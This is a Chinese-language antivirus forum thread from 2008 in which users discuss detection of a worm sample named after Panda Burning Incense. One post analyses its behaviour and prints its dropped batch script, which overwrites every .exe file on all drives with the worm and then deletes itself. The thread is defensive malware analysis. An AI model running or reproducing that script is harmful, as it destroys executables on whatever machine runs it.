熊猫

sungt

好几天了，到现在NOD，蜘蛛都没反应

还好，红伞报了。

chengshixueren

C:\Documents and Settings\XP\Local Settings\Temp\~DFD699.tmp
C:\WINDOWS\熊猫烧香.exe
C:\WINDOWS\abc.bat
调用cmd.exe
创建C:\windows\msconfig.inf

abc.bat中内容:
FOR %%a in ( c: d: e: f: g: h: i: j: k: l: m: n: o: p: q: r: s: t: u: v: w: s: y: z: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "%cd%\熊猫烧香.exe" "%%i"
del "c:\windows\msconfig.inf"
del %0

msconfig.inf中的内容:
c:\WINDOWS\twunk_16.exe
c:\WINDOWS\twunk_32.exe
c:\WINDOWS\winhelp.exe
c:\WINDOWS\explorer.exe
c:\WINDOWS\regedit.exe
c:\WINDOWS\hh.exe
c:\WINDOWS\winhlp32.exe
c:\WINDOWS\NOTEPAD.EXE
c:\WINDOWS\TASKMAN.EXE
c:\WINDOWS\熊猫烧香.exe
c:\WINDOWS\system32\sort.exe
c:\WINDOWS\system32\append.exe
c:\WINDOWS\system32\arp.exe
c:\WINDOWS\system32\asr_ldm.exe
c:\WINDOWS\system32\attrib.exe
c:\WINDOWS\system32\bootcfg.exe
c:\WINDOWS\system32\bootok.exe
c:\WINDOWS\system32\bootvrfy.exe
c:\WINDOWS\system32\cacls.exe
c:\WINDOWS\system32\chkdsk.exe
c:\WINDOWS\system32\chkntfs.exe
c:\WINDOWS\system32\cidaemon.exe
c:\WINDOWS\system32\ckcnv.exe
c:\WINDOWS\system32\help.exe
c:\WINDOWS\system32\comp.exe
c:\WINDOWS\system32\compact.exe
c:\WINDOWS\system32\control.exe
c:\WINDOWS\system32\convert.exe
c:\WINDOWS\system32\debug.exe
c:\WINDOWS\system32\diskperf.exe
c:\WINDOWS\system32\dllhst3g.exe
c:\WINDOWS\system32\doskey.exe
c:\WINDOWS\system32\driverquery.exe
c:\WINDOWS\system32\drwatson.exe
c:\WINDOWS\system32\drwtsn32.exe
c:\WINDOWS\system32\dvdplay.exe
c:\WINDOWS\system32\edlin.exe
c:\WINDOWS\system32\esentutl.exe
c:\WINDOWS\system32\eventvwr.exe
c:\WINDOWS\system32\eventtriggers.exe
c:\WINDOWS\system32\exe2bin.exe
c:\WINDOWS\system32\expand.exe
c:\WINDOWS\system32\fastopen.exe
c:\WINDOWS\system32\fc.exe
c:\WINDOWS\system32\find.exe
c:\WINDOWS\system32\finger.exe
c:\WINDOWS\system32\fixmapi.exe
c:\WINDOWS\system32\forcedos.exe
c:\WINDOWS\system32\fsutil.exe
c:\WINDOWS\system32\gdi.exe
c:\WINDOWS\system32\getmac.exe
c:\WINDOWS\system32\hostname.exe
c:\WINDOWS\system32\ipsec6.exe
c:\WINDOWS\system32\label.exe
c:\WINDOWS\system32\lights.exe
c:\WINDOWS\system32\lodctr.exe
c:\WINDOWS\system32\lpq.exe
c:\WINDOWS\system32\lpr.exe
c:\WINDOWS\system32\mem.exe
c:\WINDOWS\system32\mountvol.exe
c:\WINDOWS\system32\mpnotify.exe
c:\WINDOWS\system32\mrinfo.exe
c:\WINDOWS\system32\mscdexnt.exe
c:\WINDOWS\system32\msswchx.exe
c:\WINDOWS\system32\nbtstat.exe
c:\WINDOWS\system32\nlsfunc.exe
c:\WINDOWS\system32\ntsd.exe
c:\WINDOWS\system32\nw16.exe
c:\WINDOWS\system32\nwscript.exe
c:\WINDOWS\system32\regedt32.exe
c:\WINDOWS\system32\pathping.exe
c:\WINDOWS\system32\ping6.exe
c:\WINDOWS\system32\print.exe
c:\WINDOWS\system32\rasautou.exe
c:\WINDOWS\system32\rasdial.exe
...........
感染所有盘中的exe文件

[ 本帖最后由 chengshixueren 于 2008-8-13 22:56 编辑 ]

tanlimo

好了，卡8现在可以杀了

2008-8-13 22:55:18        检测到: Worm.Win32.VB.ve        Internet Explorer                http://bbs.kafan.cn/attachment.p ... &t=1218639133//熊猫烧香.exe//PE_Patch.UPX//UPX